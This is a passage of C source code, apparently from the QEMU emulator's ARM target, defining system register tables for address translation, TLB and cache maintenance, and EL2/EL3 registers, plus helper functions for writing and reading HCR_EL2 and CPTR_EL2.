ats_write64 }, { .name = "AT_S12E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E0R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E0W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 7, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, /* AT S1E2* are elsewhere as they UNDEF from EL3 if EL2 is not present */ { .name = "AT_S1E3R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 7, .crm = 8, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E3W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 7, .crm = 8, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "PAR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 7, .crm = 4, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.par_el[1]), .writefn = par_write }, /* TLB invalidate last level of translation table walk */ { .name = "TLBIMVALIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_is_write }, { .name = "TLBIMVAALIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 7, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_is_write }, { .name = "TLBIMVAL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "TLBIMVAAL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 7, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_write }, { .name = "TLBIMVALH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_write }, { .name = "TLBIMVALHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_is_write }, { .name = "TLBIIPAS2", .cp = 15, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_write }, { .name = "TLBIIPAS2IS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_is_write }, { .name = "TLBIIPAS2L", .cp = 15, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_write }, { .name = "TLBIIPAS2LIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_is_write }, /* 32 bit cache operations */ { .name = "ICIALLUIS", .cp = 15, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 0, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "BPIALLUIS", .cp = 15, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 6, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "ICIALLU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 0, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "ICIMVAU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "BPIALL", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 6, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "BPIMVA", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 7, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "DCIMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCISW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, { .name = "DCCMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCCSW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, { .name = "DCCMVAU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 11, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "DCCIMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCCISW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, /* MMU Domain access control / MPU write buffer control */ { .name = "DACR", .cp = 15, .opc1 = 0, .crn = 3, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .writefn = dacr_write, .raw_writefn = raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dacr_s), offsetoflow32(CPUARMState, cp15.dacr_ns) } }, { .name = "ELR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, elr_el[1]) }, { .name = "SPSR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_SVC]) }, /* We rely on the access checks not allowing the guest to write to the * state field when SPSel indicates that it's being used as the stack * pointer. */ { .name = "SP_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = sp_el0_access, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[0]) }, { .name = "SP_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[1]) }, { .name = "SPSel", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = spsel_read, .writefn = spsel_write }, { .name = "FPEXC32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 3, .opc2 = 0, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, vfp.xregs[ARM_VFP_FPEXC]), .access = PL2_RW, .accessfn = fpexc32_access }, { .name = "DACR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 3, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = 0, .writefn = dacr_write, .raw_writefn = raw_write, .fieldoffset = offsetof(CPUARMState, cp15.dacr32_el2) }, { .name = "IFSR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 0, .opc2 = 1, .access = PL2_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.ifsr32_el2) }, { .name = "SPSR_IRQ", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_IRQ]) }, { .name = "SPSR_ABT", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_ABT]) }, { .name = "SPSR_UND", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 2, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_UND]) }, { .name = "SPSR_FIQ", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 3, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_FIQ]) }, { .name = "MDCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 3, .opc2 = 1, .resetvalue = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.mdcr_el3) }, { .name = "SDCR", .type = ARM_CP_ALIAS, .cp = 15, .opc1 = 0, .crn = 1, .crm = 3, .opc2 = 1, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .writefn = sdcr_write, .fieldoffset = offsetoflow32(CPUARMState, cp15.mdcr_el3) }, REGINFO_SENTINEL }; /* Used to describe the behaviour of EL2 regs when EL2 does not exist. */ static const ARMCPRegInfo el3_no_el2_cp_reginfo[] = { { .name = "VBAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 0, .access = PL2_RW, .readfn = arm_cp_read_zero, .writefn = arm_cp_write_ignore }, { .name = "HCR_EL2", .state = ARM_CP_STATE_BOTH, .type = ARM_CP_NO_RAW, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HACR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 7, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ESR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CPTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AMAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HAMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "VTCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "VTTBR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 6, .crm = 2, .access = PL2_RW, .accessfn = access_el3_aa32ns, .type = ARM_CP_CONST | ARM_CP_64BIT, .resetvalue = 0 }, { .name = "VTTBR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "SCTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TTBR0_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HTTBR", .cp = 15, .opc1 = 4, .crm = 2, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHCTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTVOFF_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTVOFF", .cp = 15, .opc1 = 4, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CVAL", .cp = 15, .opc1 = 6, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MDCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 1, .access = PL2_RW, .accessfn = access_tda, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HPFAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HSTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "FAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HIFAR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_CONST, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 2, .access = PL2_RW, .resetvalue = 0 }, REGINFO_SENTINEL }; /* Ditto, but for registers which exist in ARMv8 but not v7 */ static const ARMCPRegInfo el3_no_el2_v8_cp_reginfo[] = { { .name = "HCR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 4, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void do_hcr_write(CPUARMState *env, uint64_t value, uint64_t valid_mask) { ARMCPU *cpu = env_archcpu(env); if (arm_feature(env, ARM_FEATURE_V8)) { valid_mask |= MAKE_64BIT_MASK(0, 34); /* ARMv8.0 */ } else { valid_mask |= MAKE_64BIT_MASK(0, 28); /* ARMv7VE */ } if (arm_feature(env, ARM_FEATURE_EL3)) { valid_mask &= ~HCR_HCD; } else if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { /* Architecturally HCR.TSC is RES0 if EL3 is not implemented. * However, if we're using the SMC PSCI conduit then QEMU is * effectively acting like EL3 firmware and so the guest at * EL2 should retain the ability to prevent EL1 from being * able to make SMC calls into the ersatz firmware, so in * that case HCR.TSC should be read/write. */ valid_mask &= ~HCR_TSC; } if (arm_feature(env, ARM_FEATURE_AARCH64)) { if (cpu_isar_feature(aa64_vh, cpu)) { valid_mask |= HCR_E2H; } if (cpu_isar_feature(aa64_lor, cpu)) { valid_mask |= HCR_TLOR; } if (cpu_isar_feature(aa64_pauth, cpu)) { valid_mask |= HCR_API | HCR_APK; } } /* Clear RES0 bits. */ value &= valid_mask; /* These bits change the MMU setup: * HCR_VM enables stage 2 translation * HCR_PTW forbids certain page-table setups * HCR_DC Disables stage1 and enables stage2 translation */ if ((env->cp15.hcr_el2 ^ value) & (HCR_VM | HCR_PTW | HCR_DC)) { tlb_flush(CPU(cpu)); } env->cp15.hcr_el2 = value; /* * Updates to VI and VF require us to update the status of * virtual interrupts, which are the logical OR of these bits * and the state of the input lines from the GIC. (This requires * that we have the iothread lock, which is done by marking the * reginfo structs as ARM_CP_IO.) * Note that if a write to HCR pends a VIRQ or VFIQ it is never * possible for it to be taken immediately, because VIRQ and * VFIQ are masked unless running at EL0 or EL1, and HCR * can only be written at EL2. */ arm_cpu_update_virq(cpu); arm_cpu_update_vfiq(cpu); } static void hcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { do_hcr_write(env, value, 0); } static void hcr_writehigh(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Handle HCR2 write, i.e. write to high half of HCR_EL2 */ value = deposit64(env->cp15.hcr_el2, 32, 32, value); do_hcr_write(env, value, MAKE_64BIT_MASK(0, 32)); } static void hcr_writelow(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Handle HCR write, i.e. write to low half of HCR_EL2 */ value = deposit64(env->cp15.hcr_el2, 0, 32, value); do_hcr_write(env, value, MAKE_64BIT_MASK(32, 32)); } /* * Return the effective value of HCR_EL2. * Bits that are not included here: * RW (read from SCR_EL3.RW as needed) */ uint64_t arm_hcr_el2_eff(CPUARMState *env) { uint64_t ret = env->cp15.hcr_el2; if (arm_is_secure_below_el3(env)) { /* * "This register has no effect if EL2 is not enabled in the * current Security state". This is ARMv8.4-SecEL2 speak for * !(SCR_EL3.NS==1 || SCR_EL3.EEL2==1). * * Prior to that, the language was "In an implementation that * includes EL3, when the value of SCR_EL3.NS is 0 the PE behaves * as if this field is 0 for all purposes other than a direct * read or write access of HCR_EL2". With lots of enumeration * on a per-field basis. In current QEMU, this is condition * is arm_is_secure_below_el3. * * Since the v8.4 language applies to the entire register, and * appears to be backward compatible, use that. */ return 0; } /* * For a cpu that supports both aarch64 and aarch32, we can set bits * in HCR_EL2 (e.g. via EL3) that are RES0 when we enter EL2 as aa32. * Ignore all of the bits in HCR+HCR2 that are not valid for aarch32. */ if (!arm_el_is_aa64(env, 2)) { uint64_t aa32_valid; /* * These bits are up-to-date as of ARMv8.6. * For HCR, it's easiest to list just the 2 bits that are invalid. * For HCR2, list those that are valid. */ aa32_valid = MAKE_64BIT_MASK(0, 32) & ~(HCR_RW | HCR_TDZ); aa32_valid |= (HCR_CD | HCR_ID | HCR_TERR | HCR_TEA | HCR_MIOCNCE | HCR_TID4 | HCR_TICAB | HCR_TOCU | HCR_TTLBIS); ret &= aa32_valid; } if (ret & HCR_TGE) { /* These bits are up-to-date as of ARMv8.6. */ if (ret & HCR_E2H) { ret &= ~(HCR_VM | HCR_FMO | HCR_IMO | HCR_AMO | HCR_BSU_MASK | HCR_DC | HCR_TWI | HCR_TWE | HCR_TID0 | HCR_TID2 | HCR_TPCP | HCR_TPU | HCR_TDZ | HCR_CD | HCR_ID | HCR_MIOCNCE | HCR_TID4 | HCR_TICAB | HCR_TOCU | HCR_ENSCXT | HCR_TTLBIS | HCR_TTLBOS | HCR_TID5); } else { ret |= HCR_FMO | HCR_IMO | HCR_AMO; } ret &= ~(HCR_SWIO | HCR_PTW | HCR_VF | HCR_VI | HCR_VSE | HCR_FB | HCR_TID1 | HCR_TID3 | HCR_TSC | HCR_TACR | HCR_TSW | HCR_TTLB | HCR_TVM | HCR_HCD | HCR_TRVM | HCR_TLOR); } return ret; } static void cptr_el2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* * For A-profile AArch32 EL3, if NSACR.CP10 * is 0 then HCPTR.{TCP11,TCP10} ignore writes and read as 1. */ if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0x3 << 10); value |= env->cp15.cptr_el[2] & (0x3 << 10); } env->cp15.cptr_el[2] = value; } static uint64_t cptr_el2_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* * For A-profile AArch32 EL3, if NSACR.CP10 * is 0 then HCPTR.{TCP11,TCP10} ignore writes and read as 1. */ uint64_t value = env->cp15.cptr_el[2]; if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value |= 0x3 << 10; } return value; } static const ARMCPRegInfo el2_cp_reginfo[] = { { .name = "HCR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hcr_el2), .writefn = hcr_write }, { .name = "HCR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS | ARM_CP_IO, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hcr_el2), .writefn = hcr_writelow }, { .name = "HACR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 7, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ELR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 0, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, elr_el[2]) }, { .name = "ESR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 2, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[2]) }, { .name = "FAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.far_el[2]) }, { .name = "HIFAR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 2, .access = PL2_RW, .fieldoffset = offsetofhigh32(CPUARMState, cp15.far_el[2]) }, { .name = "SPSR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 0, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_HYP]) }, { .name = "VBAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 0, .access = PL2_RW, .writefn = vbar_write, .fieldoffset = offsetof(CPUARMState, cp15.vbar_el[2]), .resetvalue = 0 }, { .name = "SP_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 1, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[2]) }, { .name = "CPTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 2, .access = PL2_RW, .accessfn = cptr_access, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.cptr_el[2]), .readfn = cptr_el2_read, .writefn = cptr_el2_write }, { .name = "MAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[2]), .resetvalue = 0 }, { .name = "HMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetofhigh32(CPUARMState, cp15.mair_el[2]) }, { .name = "AMAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, /* HAMAIR1 is mapped to AMAIR_EL2[63:32] */ { .name = "HAMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 2, .access = PL2_RW, .writefn = vmsa_tcr_el12_write, /* no .raw_writefn or .resetfn needed as we never use mask/base_mask */ .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[2]) }, { .name = "VTCR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .type = ARM_CP_ALIAS, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.vtcr_el2) }, { .name = "VTCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .access = PL2_RW, /* no .writefn needed as this can't cause an ASID change; * no .raw_writefn or .resetfn needed as we never use mask/base_mask */ .fieldoffset = offsetof(CPUARMState, cp15.vtcr_el2) }, { .name = "VTTBR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 6, .crm = 2, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.vttbr_el2), .writefn = vttbr_write }, { .name = "VTTBR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 0, .access = PL2_RW, .writefn = vttbr_write, .fieldoffset = offsetof(CPUARMState, cp15.vttbr_el2) }, { .name = "SCTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 0, .access = PL2_RW, .raw_writefn = raw_write, .writefn = sctlr_write, .fieldoffset = offsetof(CPUARMState, cp15.sctlr_el[2]) }, { .name = "TPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 2, .access = PL2_RW, .resetvalue = 0, 